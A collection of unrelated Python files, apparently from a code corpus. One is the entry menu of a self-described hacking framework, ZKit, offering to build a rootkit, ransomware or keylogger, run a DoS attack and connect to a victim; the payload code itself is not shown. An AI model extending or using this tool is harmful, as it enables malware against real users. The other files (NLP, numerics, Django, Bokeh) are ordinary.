print('The Bi-grammes took a total of %.3f minutes to do training and prediction.' % ((end_time - start_time) / 60))
# %%
'''
# Part-of-speech tagging
'''
# alternative for parse:nlp = spacy.load('en', disable=['parser', 'tagger']),tagger = Tagger(nlp.vocab)
# Rule-based post-correction of the bi-gram predictions, driven by the
# dependency parse / POS tags of each predicted sentence:
#   rule1:       singular-noun subject -> 3rd person singular verb form
#   rule2:       plural subject or expletive -> plural verb form
#   rule4/42/43: a 4-digit object (a year) followed by a subject switches
#                the next verb to past tense (was/were)
nlp2 = spacy.load('en')
start_time = time.time()
parse_pred_sents = []
for i, sent in enumerate(bigramms_pred_sents):
    parsed_sent = nlp2(sent)
    parse_pred_sent = []
    rule1 = False
    rule2 = False
    rule3 = False
    rule4 = False
    rule42 = False
    rule43 = False
    for j, token in enumerate(parsed_sent):
        if token.dep_ == 'nsubj' and token.tag_ == 'NN':  # noun, singular or mass
            rule1 = True
        if token.dep_ == 'nsubj' and token.tag_ == 'NNS' or token.dep_ == 'expl':
            rule2 = True
        # this rule is not so good:
        # if token.pos_=='NUM':
        #     rule3=True
        if token.dep_ == 'pobj' and token.tag_ == 'CD' and len(token.text) == 4:  # 1990
            rule4 = True
        if rule4 and token.dep_ == 'nsubj' and token.tag_ == 'NN':
            rule42 = True
            rule4 = False
        if rule4 and (token.dep_ == 'nsubj' and token.tag_ == 'NNS' or token.dep_ == 'expl'):
            rule43 = True
            rule4 = False
        # each rule fires on the first following VERB, then resets itself
        if rule1 and token.pos_ == 'VERB':
            rule1 = False
            if token.text == 'be':
                parse_pred_sent.append('is')
                continue
            if token.text == 'have':
                parse_pred_sent.append('has')
                continue
            if token.text == token.lemma_:
                parse_pred_sent.append(token.text + 's')
                continue
        if rule2 and token.pos_ == 'VERB':
            rule2 = False
            if token.text == 'be':
                parse_pred_sent.append('are')
                continue
            if token.text == 'has':
                parse_pred_sent.append('have')
                continue
        if rule3 and token.tag_ == 'NN':
            rule3 = False
            if token.text == token.lemma_:
                parse_pred_sent.append(token.text + 's')
                continue
        if rule42 and token.pos_ == 'VERB':
            rule42 = False
            if token.text in ['be', 'is']:
                parse_pred_sent.append('was')
                continue
            # this rule is not so good:
            # if token.text==token.lemma_ and token.text.endswith('e'):
            #     parse_pred_sent.append(token.text+'d')
            #     # print(' '.join(parse_pred_sent))
            #     continue
        if rule43 and token.pos_ == 'VERB':
            rule43 = False
            if token.text in ['be', 'are']:
                parse_pred_sent.append('were')
                continue
            # this rule is not so good:
            # if token.text==token.lemma_ and token.text.endswith('e'):
            #     parse_pred_sent.append(token.text+'d')
            #     # print(' '.join(parse_pred_sent))
            #     continue
        # no rule matched: keep the token as predicted by the bi-gram model
        parse_pred_sent.append(token.text)
    parse_pred_sents.append(' '.join(parse_pred_sent))
taux_accu = accuracy(test_surf_tacy_sents_raw, parse_pred_sents)
print('Accuracy of Parse predicteur on test data:', taux_accu)
end_time = time.time()
print('The Parse took a total of %.3f minutes to do training and prediction.' % ((end_time - start_time) / 60))
# %%
# test code
# parse_pred_sent=[]
# parsed_sent=nlp2(bigramms_pred_sents[2371]) #772,123,2371
# rule1=False
# for j,token in enumerate( parsed_sent):
# print(token.text, token.pos_, token.tag_, token.dep_)
# if token.dep_=='nsubj' and token.tag_=='NN':
# rule1=True
# if rule1 and token.pos_=='VERB':
# rule1=False
# if token.text=='be':
# parse_pred_sent.append('is')
# continue
# if token.text=='have':
# parse_pred_sent.append('has')
# continue
# if token.text==token.lemma_:
# parse_pred_sent.append(token.text+'s')
# continue
# parse_pred_sent.append(token.text)
# print(' '.join(parse_pred_sent))
| nilq/baby-python | python |
"ZKit-Framework Github : https://github.com/000Zer000/ZKit-Framework"
# Copyright (c) 2020, Zer0 . All rights reserved.
# This Work Is Licensed Under Apache Software License 2.0 More
# Can Be Found In The LICENSE File.
__author__ = "Zer0"
__version__ = "1.4.5"
__license__ = "Apache Software License 2.0"
__status__ = "Production"
import os
from datetime import datetime as dt
import sys
def start():
    """Start ZKit's interactive menu loop.

    Imports the framework helpers, prints the colored banner, then keeps
    dispatching on the user's menu choice until '000' is entered. Any
    unexpected error is handed to crash_handler().
    """
    try:
        try:
            # Doing some imports
            from core.helper_core import notify, Color, Generate, dos, \
                ctrler, helpbanner, init, print_banner, list_builtin_payloads, search_for_payloads, crash_handler
        except (ImportError, ModuleNotFoundError) as value:
            # Ops ! Sth is missing
            print(
                "One Or Some On Requirments Not Found . Please Install Them And Try Again ."
                + "Python Threw : "
                + str(value)
            )
            raise
        # Printing A Banner More Coming Soon
        _, red, green, yellow, blue, magenta, cyan, _, reset = Color().GetAllColors()
        init()
        print_banner()
        # Hard And Boring Code
        print(
            "\t " * 5 + "Hacking is" + red + " C " + green + "O " + blue + "L " +
            yellow + "O " + magenta + "R " + green +
            "F " + red + "U " + magenta + "L " + reset
        )
        print(
            "Available Options Are or Enter '?' To get a summery about notes of using this framework:\n"
            + red + " {1} --> Create A RootKit\n"
            + green + " {2} --> Create A Ransomware (Beta)\n"
            + blue + " {3} --> Create A KeyLogger \n"
            + yellow + " {4} --> Run A Dos Attack\n"
            + magenta + " {5} --> Connect To A Victim\n"
            + red + " {6} --> Generate Your User Payloads\n"
            + cyan + " {000}" + "--> Exit ZKit-Framework\n" + reset
        )
        while True:
            try:
                choice = str(input("..> "))
                if choice == "000":
                    break
                if choice == "?":
                    print(helpbanner)
                elif choice == "1":
                    payloads = list_builtin_payloads('rootkit')
                    index = input("")
                    Generate(list(payloads.values())[int(index) - 1])
                elif choice == "2":
                    print(
                        "This Feature (Ransomware) is beta and have not tested . continue anyway ? (Y/N) : ", end="")
                    agreed = True if str(
                        input("")).lower().strip() == "y" else False
                    if agreed:
                        payloads = list_builtin_payloads('ransomware')
                        index = input("")
                        Generate(list(payloads.values())[int(index) - 1])
                    else:
                        print("Ignoring . Back To Main Menu.")
                elif choice == "3":
                    payloads = list_builtin_payloads('keylogger')
                    index = input("")
                    Generate(list(payloads.values())[int(index) - 1])
                elif choice == "4":
                    dos.main()
                elif choice == "5":
                    ctrler.Main()
                elif choice == "6":
                    # bugfix: this called list_payloads(), which is neither
                    # defined nor imported anywhere (guaranteed NameError);
                    # the helper imported above is search_for_payloads.
                    payloads = search_for_payloads()
                    if len(payloads) == 0:
                        print(
                            "No User Payload Was Found . Please Download one from zkit-market or make one using zkit-payload-template")
                    else:
                        print("Please Choose One Of Them (Number Of It): ", end="")
                        index = input("")
                        Generate(list(payloads.values())[int(index) - 1])
                elif choice is not None:
                    notify(
                        "problem", "Invalid Input {" + "{}".format(choice) + "}")
            except (KeyboardInterrupt, EOFError):
                print("\nPlease Type '000' To Exit ZKit-Framework\n")
                choice = None
    except BaseException as e:
        crash_handler(e)
start()
| nilq/baby-python | python |
# Implement Bubble Sort
import time
# we have a data set starting with the very basic happy path to complex
# Datasets used by the __main__ benchmark below, ordered from the basic
# happy path to progressively trickier edge cases.
data = {
    "data1" : [5,4,1,3,2], # happy path easy to vizualize
    "data2" : [5,4,1999,3,2,8,7,6,10,100], #larger range of values
    "data3" : [5,4,1,3,2,2], # repeated values
    "data4" : [1,1,1,1,1,1], # every element is the same
    "data5" : [0,22,100,1,2,3,4,5,6,7,7,8,89,9,0,-1], #negative + zero
    "data6" : [5,4,3,2,1], #reverse sorted array
    "data7" : [1], # data with only 1 value
    "data8" : [], # data with NULL value
    "data9" : [4,2,1,6,2,10,4,3,10,6,5,6,7,2,10,10,4,6,5,8],
}
#-----------------------------------------------------------------------------#
# INSERTION SORTING
#-----------------------------------------------------------------------------#
def top_k(arr, k):
    """Return the k largest distinct values of *arr*, in descending order.

    Returns fewer than k values when arr has fewer distinct elements, and
    an empty list for an empty arr. Unlike the original draft, the input
    list is NOT sorted/mutated in place (the original called
    arr.sort(reverse=True) on the caller's list), and the dead
    commented-out bubble-sort code has been removed.
    """
    return sorted(set(arr), reverse=True)[:k]
if __name__ == "__main__":
    # Benchmark top_k over every dataset. (Fixed: a stray
    # "| nilq/baby-python | python |" artifact was fused onto the last
    # line, which referenced undefined names at runtime.)
    # NOTE(review): the printed label says "Insertion time" but this
    # times top_k, not an insertion sort.
    k = 4
    for i in range(len(data)):
        start_time = time.time()
        print(top_k(data["data"+str(i+1)],k))
        print("Insertion time for data" + str(i+1) + " = "+ str(time.time() - start_time))
import numpy as np
import time
from numba import njit, prange
def exact_solver_wrapper(A_org, Q, p, L, delta_l, delta_g, constr='1'):
    """Dispatch to the exact attack matching the requested constraint set.

    param:
        A_org: original adjacency matrix
        Q: matrix, Q_i = Q[i]
        p: vector
        L: matrix, L_i = L[i]
        delta_l: row budgets. If it is a scalar, expand to list with same value
        delta_g: global budget
        constr: '1' -> local budgets only, '1+2' -> local + global,
                '2' -> global only (not implemented)
    return:
        (unpert_val, opt_val, A_pert) from the chosen solver; for
        constr='1' the two value entries are per-row vectors.
    """
    if constr == '1':
        # Exact attacks for A^1
        return local_budget_solver(A_org, Q, p, L, delta_l, delta_g)
    if constr == '1+2':
        # Exact attacks for A^{1+2}
        return dp_solver(A_org, Q, p, L, delta_l, delta_g)
    if constr == '2':
        # Exact attacks for A^2
        raise NotImplementedError('Exact attacks for A^2 is not implemented!')
@njit("(float64[:, :], float64[:, :], float64[:], float64[:, :], int64)", parallel=False, fastmath=True, cache=True)
# # @njit(parallel=True, fastmath=True)
# # @njit
def local_budget_precompute(A_org, Q, p, L, delta_l):
    """
    solver of equation 8&11 of the paper when activation is identity, max_margin loss and average pooling

    For every row i and every per-row budget j <= delta_l, computes the
    minimal objective value a[i, j] reachable by flipping at most j edges
    in row i, and the number of added edges achieving it
    (add_edge_matrix[i, j]).
    """
    nG = A_org.shape[0]
    a = np.zeros((nG+1, delta_l+1)) # matrix a for described in equation 6
    add_edge_matrix = np.zeros((nG+1, delta_l+1))
    for i in range(1, nG+1): # looping each row of A
        A_i = A_org[i-1,:]
        A_i_edges = int(np.sum(A_i))
        Q_i = Q[i-1]
        L_i = L[i-1]
        # range of possible degrees (1'A_i + 1) after at most delta_l flips
        max_edges = min(A_i_edges + delta_l + 1, nG)
        min_edges = max(A_i_edges - delta_l + 1, 1)
        possible_denomi = max_edges - min_edges + 1
        chunk_edges_mtx, chunk_no_edges_mtx = np.zeros((possible_denomi,delta_l+1)), np.zeros((possible_denomi,delta_l+1))
        for x in range(min_edges, max_edges+1): # looping all possible (1'A_i + 1)
            V_L = Q_i + L_i*x
            indices = np.argsort(V_L)
            chunk_edges, chunk_no_edges = [0.0]*(delta_l+1), [0.0]*(delta_l+1)
            # prefix sums of the smallest V_L values over non-edges (candidates to add)
            temp_idx = 1
            for y in indices:
                if temp_idx > delta_l: break
                if y == i-1: continue # excluding self edge
                if A_i[y] == 0:
                    chunk_no_edges[temp_idx] = V_L[y] + chunk_no_edges[temp_idx-1]
                    temp_idx += 1
            # prefix sums of the largest V_L values over existing edges (candidates to remove)
            temp_idx = 1
            for y in indices[::-1]:
                if temp_idx > delta_l: break
                if y == i-1: continue # excluding self edge
                if A_i[y] == 1:
                    chunk_edges[temp_idx] = V_L[y] + chunk_edges[temp_idx-1]
                    temp_idx += 1
            chunk_edges_mtx[x - min_edges] = chunk_edges
            chunk_no_edges_mtx[x - min_edges] = chunk_no_edges
        A_V_i = np.dot(A_i, Q_i) + Q_i[i-1] + p[i-1]
        A_L_i = np.dot(A_i, L_i)
        a[i,0] = A_V_i/(A_i_edges+1) + A_L_i
        for j in range(1,delta_l+1): # looping each possible local constraint
            min_f = np.inf
            # NOTE(review): if every (add, remove) split is infeasible, `sol`
            # keeps its value from a previous j (or is undefined on the first
            # j) — confirm the budget ranges keep some split reachable.
            for k in range(j+1): # looping different combinations of adding/removing
                add_edges, remove_edges = k, j-k
                if A_i_edges+add_edges > nG-1 or A_i_edges-remove_edges < 0:
                    continue
                new_edges = A_i_edges+add_edges-remove_edges + 1
                f = A_V_i + A_L_i*new_edges
                # adding k edges from chunk of A_i=0 in ascent order
                if add_edges > 0:
                    # print(chunk_no_edges_mtx[new_edges][add_edges])
                    f += chunk_no_edges_mtx[new_edges - min_edges][add_edges]
                # removing j-k edges from chunk of A_i=1 in descent order
                if remove_edges > 0:
                    # print(chunk_edges_mtx[new_edges][remove_edges])
                    f -= chunk_edges_mtx[new_edges - min_edges][remove_edges]
                final_f = f/new_edges
                if final_f < min_f:
                    min_f = final_f
                    sol = (min_f, add_edges)
            a[i,j], add_edge_matrix[i,j] = sol
    return a, add_edge_matrix
@njit("(float64[:], float64[:], float64[:], int64, int64, int64)", cache=True)
def get_A_opt(Q_i, A_i, L_i, i, j, add_edges):
    """Rebuild the perturbed row i: with total budget j and `add_edges`
    additions chosen by the precomputation, turn on the add_edges
    non-edges with smallest V_L and turn off the (j - add_edges) edges
    with largest V_L, always excluding the self edge."""
    A_i_edges = np.sum(A_i)
    remove_edges = j - add_edges
    # degree of the row after the flips, i.e. (1'A_i + 1)
    new_edges = A_i_edges+add_edges-remove_edges + 1
    V_L = Q_i + L_i.T*new_edges
    indices = np.argsort(V_L)
    A_new_i = A_i.copy()
    added_edges = 0
    for y in indices:
        if added_edges == add_edges: break
        if y == i-1: continue # excluding self edge
        if A_i[y] == 0:
            A_new_i[y] = 1
            added_edges += 1
    removed_edges = 0
    for y in indices[::-1]:
        if removed_edges == remove_edges: break
        if y == i-1: continue # excluding self edge
        if A_i[y] == 1:
            A_new_i[y] = 0
            removed_edges += 1
    return A_new_i
@njit("(float64[:,:], float64[:,:], float64[:], float64[:,:], int64[:], int64)", cache=True)
def dp_solver(A_org, Q, p, L, delta_l, delta_g):
    """
    DP for solving min_{A_G^{1+2}} \sum_i [(A_i+e_i)@Q_i + p_i]/(1'A_i + 1) + A_i@L_i]
    Algorithm 1:
    1. Precomputing matrix a
    2. DP to get matrix s
    3. Tracing back
    Complexity: nG^2*delta_l*log(nG) + nG*delta_l^2 + nG^2*delta_l^2
    param:
        A_org: original adjacency matrix
        Q: matrix, Q_i = Q[i]
        p: vector
        L: matrix, L_i = L[i]
        delta_l: row budgets
        delta_g: global budgets
    return:
        (unpert_val, opt_val, A_pert): objective value without perturbation,
        minimal objective value within the budgets, and the perturbed
        adjacency matrix achieving it.
    """
    # start = time.time()
    max_delta_l = max(delta_l)
    a, add_edge_matrix = local_budget_precompute(A_org, Q, p, L, max_delta_l)
    # print(f'Precomputation of matrix a: {time.time() - start}')
    # ---------------------FIRST LOOP---------------------
    nG = A_org.shape[0]
    # c[t]: maximal total budget usable by the first t rows (capped by delta_g)
    c = [0]*(nG+1)
    for t in range(1, nG+1):
        c[t] = min(c[t-1]+delta_l[t-1], delta_g)
    s = [np.array([0.0]*(i+1)) for i in c]
    # s = np.zeros((nG+1, min(nG*np.max(delta_l), delta_g)+1))
    # s[t][j]: best cumulative objective over rows 1..t using at most j flips
    for t in range(1, nG+1):
        st_1, st, at = s[t-1], s[t], a[t]
        for j in range(0,c[t]+1):
            m = np.inf
            for k in range(max(0, j-c[t-1]), min(j, delta_l[t-1])+1):
                m = min(st_1[j-k]+at[k], m) # accessing s seems costly
            st[j] = m
    # ---------------------SECOND LOOP---------------------
    # Trace back which per-row budget kt realized the optimum for each row.
    A_pert = np.zeros((nG,nG))
    j = np.argmin(s[nG]) # this sort takes nG*delta_l log(nG*delta_l)
    opt_val = s[nG][j]
    unpert_val = s[nG][0]
    for t in range(nG,0,-1):
        temp = np.ones(delta_l[t-1]+1)*np.inf
        st_1, at = s[t-1], a[t]
        for k in range(max(0, j-c[t-1]), min(j, delta_l[t-1])+1):
            temp[k] = st_1[j-k] + at[k]
        kt = np.argmin(temp)
        j = j - kt
        A_pert[t-1,:] = get_A_opt(Q[t-1], A_org[t-1], L[t-1], \
                        t, kt, add_edge_matrix[t][kt])
    sol = (unpert_val, opt_val, A_pert)
    return sol
@njit("(float64[:,:], float64[:,:], float64[:], float64[:,:], int64[:], int64)", cache=True)
def local_budget_solver(A_org, Q, p, L, delta_l, delta_g):
    """
    Solve each row's perturbation independently under its local budget only.
    Unlike dp_solver, the global budget is not enforced here
    (delta_g is unused; kept for a signature parallel to dp_solver).
    param:
        A_org: original adjacency matrix
        Q: matrix, Q_i = Q[i]
        p: vector
        L: matrix, L_i = L[i]
        delta_l: row budgets
        delta_g: global budget (unused)
    Returns (a[:, 0], opt_fvals, A_pert):
        a[:, 0]: per-row objective with zero changes (unperturbed values)
        opt_fvals: per-row optimal objective values
        A_pert: perturbed adjacency matrix, one independently optimized row each
    """
    max_delta_l = max(delta_l)
    a, add_edge_matrix = local_budget_precompute(A_org, Q, p, L, max_delta_l)
    nG = A_org.shape[0]
    A_pert = np.zeros((nG,nG))
    opt_fvals = np.zeros(nG)
    for i in range(nG):
        delta_l_i = delta_l[i]
        # best number of changes for row i within its local budget
        best_delta_l = np.argmin(a[i+1][0:(delta_l_i+1)])
        A_pert[i] = get_A_opt(Q[i], A_org[i], L[i], i+1, best_delta_l, \
                              add_edge_matrix[i+1][best_delta_l])
        opt_fvals[i] = a[i+1][best_delta_l]
    sol = (a[:, 0], opt_fvals, A_pert)
    return sol
def po_dp_solver(A_org, R, delta_l, delta_g):
    """Pairwise-objective DP solver.

    Precomputes per-row flip costs, runs the budgeted DP (first_loop),
    then traces the DP table backwards to recover how many flips each row
    received and rebuilds the perturbed adjacency matrix from them.

    param:
        A_org: original adjacency matrix (0/1 entries)
        R: reward/weight matrix, same shape as A_org
        delta_l: scalar local (per-row) flip budget
        delta_g: global flip budget
    Returns the perturbed adjacency matrix A_pert.
    """
    n_nodes = A_org.shape[0]
    # precomputing a matrix: J_ij is the objective change of flipping edge (i, j)
    J = R * (-2 * A_org + 1)
    a = po_local_solver(J, n_nodes, delta_l)
    A_pert = np.zeros((n_nodes, n_nodes))
    V_pert = np.zeros((n_nodes, n_nodes))
    c, s = first_loop(a, delta_l, delta_g)
    budget_left = np.argmin(s[n_nodes])
    unpert_val = s[n_nodes][0]
    opt_val = s[n_nodes][budget_left]
    # trace back: walk rows from last to first, deciding per-row flip counts
    for row in range(n_nodes, 0, -1):
        candidates = np.ones(delta_l + 1) * np.inf
        prev_stage, row_costs = s[row - 1], a[row]
        lo = max(0, budget_left - c[row - 1])
        hi = min(budget_left, delta_l) + 1
        for spent in range(lo, hi):
            candidates[spent] = prev_stage[budget_left - spent] + row_costs[spent]
        spent_here = np.argmin(candidates)
        budget_left = budget_left - spent_here
        # recover the 0/1 flip indicator for this row, then apply the flips
        V_pert[row - 1, :] = optVt_from_a_tj(J[row - 1, :], row, spent_here, delta_l)
        A_pert[row - 1, :] = ((2 * A_org[row - 1, :] - 1) * (-2 * V_pert[row - 1, :] + 1) + 1) / 2
    return A_pert
def po_local_solver(J, nG, delta_l):
    """Pre-compute the per-row DP cost table.

    a[i, j] holds the best (lowest) cost achievable by flipping exactly j
    off-diagonal edges in row i-1: the j most negative values of -J are
    accumulated greedily.  Row 0 and column 0 stay zero (no flips).
    """
    a = np.zeros((nG + 1, delta_l + 1))
    for row in range(1, nG + 1):
        # negated gains of row `row-1`, with the self edge removed
        gains = -np.delete(J[row - 1, :].copy(), row - 1)
        order = np.argsort(gains)
        running = 0.0
        for budget in range(1, delta_l + 1):
            # accumulate the next-cheapest flip
            running = running + gains[order[budget - 1]]
            a[row, budget] = running
    return a
def optVt_from_a_tj(J_t, t, j, delta_l):
    """Recover the optimal 0/1 flip-indicator vector for row t.

    Flips (sets to 1) the j entries of J_t with the largest gain, never
    touching the self edge at index t-1.  Consistent with po_local_solver,
    where a[t, j] is the sum of the j best gains and a[t, 0] == 0 means
    "no flips".

    param:
        J_t: gain vector for row t
        t: 1-based row index; index t-1 is the self edge
        j: number of flips allotted to this row by the DP (0 <= j <= delta_l)
        delta_l: local budget (unused here; kept for interface compatibility)
    """
    V = np.zeros(J_t.shape)
    indices = np.argsort(-J_t)  # indices sorted by descending gain
    changed_edges = 0
    for idx in indices:
        # Check BEFORE flipping so that j == 0 flips nothing.
        # (The original checked after the assignment, so even with a zero
        # allotment it flipped one edge.)
        if changed_edges >= j:
            break
        if idx == t - 1:
            continue  # excluding self edge
        V[idx] = 1
        changed_edges += 1
    return V
| nilq/baby-python | python |
from django.db import models
from django.contrib.auth.models import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin
from django.contrib.auth.models import BaseUserManager
from django.conf import settings
# Create your models here.
class UserProfileManager(BaseUserManager):
    """Manager for User Profile Model"""

    def create_user(self, email, name, mobile_no, password=None, is_supervisor=False, is_gaurd=False):
        """Create new user profile"""
        if not email:
            raise ValueError("User must have email address")
        # lower-case the domain part so look-ups are case-insensitive
        normalized = self.normalize_email(email)
        profile = self.model(
            email=normalized,
            name=name,
            mobile_no=mobile_no,
            is_supervisor=is_supervisor,
            is_gaurd=is_gaurd,
        )
        profile.set_password(password)  # hashes; never store the raw password
        profile.save(using=self._db)
        return profile

    def create_superuser(self, email, name, mobile_no, password):
        """Create and Save New SuperUser with given Details"""
        superuser = self.create_user(email, name, mobile_no, password)
        # grant every role flag, then persist the changes
        superuser.is_superuser = True
        superuser.is_staff = True
        superuser.is_supervisor = True
        superuser.is_gaurd = True
        superuser.save(using=self._db)
        return superuser
class UserProfile(AbstractBaseUser, PermissionsMixin):
    """Database model for users in the System.

    Uses email (not username) as the login identifier; role membership is
    expressed through the boolean flags below.
    """
    id = models.AutoField(primary_key=True)
    # login identifier (see USERNAME_FIELD below)
    email = models.EmailField(max_length=255,unique=True)
    name = models.CharField(max_length=255)
    # NOTE(review): first_name/last_name are never populated by
    # UserProfileManager.create_user, so get_full_name() can return just a
    # space — confirm how these fields are meant to be filled.
    first_name = models.CharField(max_length=255)
    last_name = models.CharField(max_length=255)
    mobile_no = models.CharField(max_length=12)
    is_active = models.BooleanField(default=True)
    is_staff = models.BooleanField(default=False)
    # role flags ("gaurd" spelling kept for consistency with the manager)
    is_supervisor = models.BooleanField(default=False)
    is_gaurd = models.BooleanField(default=False)
    is_demo_account = models.BooleanField(default=False)
    objects = UserProfileManager()
    USERNAME_FIELD = 'email'
    REQUIRED_FIELDS = ['name','mobile_no']
    def get_full_name(self):
        """Retrieve Full Name of User"""
        return self.first_name+' '+self.last_name
    def get_short_name(self):
        """Retrieve Short Name of User"""
        return self.name
    def get_contact_details(self):
        """Retrieve Contact Details of the User"""
        return 'Email ID: {} Mobile No: {}'.format(self.email, self.mobile_no)
    def __str__(self):
        """Return Representation of User"""
        return self.email
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
from unittest import TestCase
import os
from auxlib.packaging import get_version
# from auxlib.packaging import (_get_version_from_pkg_info, _is_git_dirty, _get_most_recent_git_tag,
# _get_git_hash, is_git_repo)
# from auxlib.path import ROOT_PATH
# class TestPackaging(TestCase):
#
# def test_version_string(self):
# try:
# test_version = str(random.randint(0,1e6))
# with open('.version', 'w') as f:
# f.write(test_version)
# assert _get_version_from_pkg_info('tests') == test_version
# finally:
# if os.path.exists('.version'):
# os.remove('.version')
#
# def test_is_git_dirty(self):
# result = _is_git_dirty(os.getcwd())
# assert result is True or result is False
#
#
# def test_get_git_hash(self):
# hash = _get_git_hash(os.getcwd())
# assert len(hash) == 7
#
# def test_not_git_repo(self):
# assert not is_git_repo(ROOT_PATH)
class TestPackagingNotGitRepo(TestCase):
    """get_version should return None when run outside any git work tree."""

    def setUp(self):
        super(TestPackagingNotGitRepo, self).setUp()
        # remember the current directory, then move to the filesystem root,
        # which is guaranteed not to be a git repository
        self.cwd = os.getcwd()
        os.chdir('/')

    def tearDown(self):
        super(TestPackagingNotGitRepo, self).tearDown()
        # restore the working directory so later tests are unaffected
        os.chdir(self.cwd)

    def test_get_most_recent_git_tag_no_repo(self):
        assert get_version(os.getcwd()) is None
| nilq/baby-python | python |
from rest_framework import serializers
from daily_tracker.models import Attandance
class AttandanceSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer for daily_tracker.Attandance records.

    Exposes the attendance window (enter_at/out_at), total_time, and a
    self link resolved through the 'api:attandance-detail' route.
    NOTE(review): "Attandance" spelling mirrors the model name.
    """
    # self-referencing hyperlink for each record
    url = serializers.HyperlinkedIdentityField(view_name='api:attandance-detail')
    class Meta:
        model = Attandance
        fields = ('id', 'enter_at', 'out_at', 'total_time', 'url')
| nilq/baby-python | python |
import numpy as num
from decimal import *
import scipy as sci
from numpy.polynomial import polynomial as pol
def euler(f, a, b, n, y_0):
    """Explicit (forward) Euler method for u'(t) = f(t, u) on [a, b].

    Takes n steps of size h = (b - a)/n starting from u(a) = y_0, printing
    a table of the iterates as it goes.

    param:
        f: right-hand side f(t, u); receives Decimal arguments
        a, b: interval endpoints
        n: number of Euler steps (the last iterate lands on t = b)
        y_0: initial value u(a)
    Returns the list [u_0, u_1, ..., u_n] where u_k approximates u(a + k*h).
    """
    h = Decimal(b - a) / Decimal(n)
    vals = [y_0]
    print ("Indice\t | t | Aproximado(u) ")
    print("0\t | 0 |\t"+str(y_0))
    # The original looped range(0, n-1), stopping one step short of t = b;
    # n steps are needed to advance from a to b.
    for i in range(0, n):
        tj = Decimal(a + i * h)
        x = vals[i] + h * f(tj, Decimal(vals[i]))
        vals.append(x)
        # x approximates u at the END of this step, t = tj + h
        # (the original printed tj, mislabeling the new value's time)
        print(str(i + 1) + "\t | " + str(tj + h) + " |" + "\t" + str(x))
    return vals
def f(t, x):
    # Right-hand side of the test ODE u'(t) = -u + t + 1
    # (for u(0) = 1 the exact solution is u(t) = t + exp(-t)).
    return -x + t + 1
# Initial value u(0) = 1; integrate u' = f(t, u) over [0, 1] in 10 Euler steps.
f0 = 1
euler(f, 0, 1, 10, f0)
| nilq/baby-python | python |
from __future__ import absolute_import
import inspect
from textwrap import dedent
from types import FunctionType
from ..core.properties import Bool, Dict, Either, Int, Seq, String, AnyRef
from ..model import Model
from ..util.dependencies import import_required
from ..util.compiler import nodejs_compile, CompilationError
class Filter(Model):
    ''' Base model for filtering operations: applied to a ColumnDataSource,
    a Filter yields a row-wise subset of its data.
    '''
    filter = Either(Seq(Int), Seq(Bool), help="""
    A list that can be either integer indices or booleans representing a row-wise subset of data.
    """)
    def __init__(self, *args, **kw):
        # positional shorthand: Filter(xs) is equivalent to Filter(filter=xs)
        if len(args) == 1:
            kw.setdefault("filter", args[0])
        super(Filter, self).__init__(**kw)
class IndexFilter(Filter):
    ''' Selects the subset of rows found at a given set of integer indices.
    '''
    indices = Seq(Int, help="""
    A list of integer indices representing the subset of data to select.
    """)
    def __init__(self, *args, **kw):
        # positional shorthand: IndexFilter(idx) == IndexFilter(indices=idx)
        if len(args) == 1:
            kw.setdefault("indices", args[0])
        super(IndexFilter, self).__init__(**kw)
class BooleanFilter(Filter):
    ''' Selects the rows whose positions in the boolean mask hold True.
    '''
    booleans = Seq(Bool, help="""
    A list of booleans indicating which rows of data to select.
    """)
    def __init__(self, *args, **kw):
        # positional shorthand: BooleanFilter(mask) == BooleanFilter(booleans=mask)
        if len(args) == 1:
            kw.setdefault("booleans", args[0])
        super(BooleanFilter, self).__init__(**kw)
class GroupFilter(Filter):
    ''' Selects the rows of a ColumnDataSource where the categorical column
    named ``column_name`` equals ``group``.
    '''
    column_name = String(help="""
    The name of the column to perform the group filtering operation on.
    """)
    group = String(help="""
    The value of the column indicating the rows of data to keep.
    """)
    def __init__(self, *args, **kw):
        # positional shorthand: GroupFilter(col, value); only used when
        # neither keyword was given explicitly
        neither_given = "column_name" not in kw and "group" not in kw
        if neither_given and len(args) == 2:
            kw["column_name"], kw["group"] = args
        super(GroupFilter, self).__init__(**kw)
class CustomJSFilter(Filter):
    ''' Filter data sources with a custom defined JavaScript function.
    .. warning::
        The explicit purpose of this Bokeh Model is to embed *raw JavaScript
        code* for a browser to execute. If any part of the code is derived
        from untrusted user inputs, then you must take appropriate care to
        sanitize the user input prior to passing to Bokeh.
    '''
    @classmethod
    def from_py_func(cls, func):
        ''' Create a CustomJSFilter instance from a Python function. The
        function is translated to JavaScript using PScript.
        The ``func`` function namespace will contain the variable ``source``
        at render time. This will be the data source associated with the CDSView
        that this filter is added to.
        Raises ValueError if ``func`` is not a function object, takes
        positional (non-defaulted) arguments, or has a default value that is
        not a Bokeh Model.
        '''
        if not isinstance(func, FunctionType):
            raise ValueError('CustomJSFilter.from_py_func only accepts function objects.')
        pscript = import_required(
            'pscript',
            dedent("""\
                To use Python functions for CustomJSFilter, you need PScript
                '("conda install -c conda-forge pscript" or "pip install pscript")""")
        )
        # inspect.getargspec() was deprecated since Python 3.0 and removed in
        # Python 3.11; getfullargspec() exposes the same .args/.defaults
        # attributes used below (and tolerates annotated functions).
        argspec = inspect.getfullargspec(func)
        default_names = argspec.args
        default_values = argspec.defaults or []
        if len(default_names) - len(default_values) != 0:
            raise ValueError("Function may only contain keyword arguments.")
        # should the following be all of the values need to be Models?
        if default_values and not any(isinstance(value, Model) for value in default_values):
            raise ValueError("Default value must be a plot object.")
        func_kwargs = dict(zip(default_names, default_values))
        # translated function body plus a trailing call forwarding the args
        code = pscript.py2js(func, 'filter') + 'return filter(%s);\n' % ', '.join(default_names)
        return cls(code=code, args=func_kwargs)
    @classmethod
    def from_coffeescript(cls, code, args={}):
        ''' Create a CustomJSFilter instance from CoffeeScript snippets.
        The function bodies are translated to JavaScript functions using node
        and therefore require return statements.
        The ``code`` function namespace will contain the variable ``source``
        at render time. This will be the data source associated with the CDSView
        that this filter is added to.
        '''
        # NOTE: the mutable default ``args={}`` is safe here because it is
        # only read, never mutated.
        compiled = nodejs_compile(code, lang="coffeescript", file="???")
        if "error" in compiled:
            raise CompilationError(compiled.error)
        else:
            return cls(code=compiled.code, args=args)
    args = Dict(String, AnyRef, help="""
    A mapping of names to Python objects. In particular those can be bokeh's models.
    These objects are made available to the callback's code snippet as the values of
    named parameters to the callback.
    """)
    code = String(default="", help="""
